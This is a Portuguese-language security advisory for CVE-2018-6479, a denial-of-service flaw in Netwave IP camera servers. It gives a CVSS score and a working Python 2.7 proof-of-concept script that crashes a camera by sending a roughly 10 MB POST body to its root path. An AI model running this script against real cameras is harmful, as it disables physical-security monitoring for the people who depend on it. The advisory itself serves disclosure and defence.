
[CVE-2018-6479] Servidor de câmera IP Netwave vulnerável a Negação de Serviço por meio de uma única requisição POST gigante.
| CVE | Descrição |
|---|---|
| CVE-2018-6479 | Vulnerabilidade de Negação de Serviço remota não autenticada |
| CVSS | Pontuação | Detalhes |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
Durante uma pesquisa de segurança em IoT, algumas vulnerabilidades foram descobertas em diferentes fornecedores de câmeras IP. A Netwave IP Camera é um servidor de câmera IP que permite visualizar o vídeo da câmera e administrá-la. As câmeras IP são usadas especialmente para fins de segurança física e controle, portanto sua disponibilidade é crucial.
Qualquer Netwave IP Camera pode ser derrubada apenas enviando uma requisição POST gigante para seu caminho raiz. Assim que você envia a requisição, o dispositivo trava e para de transmitir áudio e vídeo.
Prova de Conceito: execute o seguinte script Python 2.7 contra qualquer NetWave IP Camera; ela parará de responder e de transmitir vídeo/áudio instantaneamente.
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León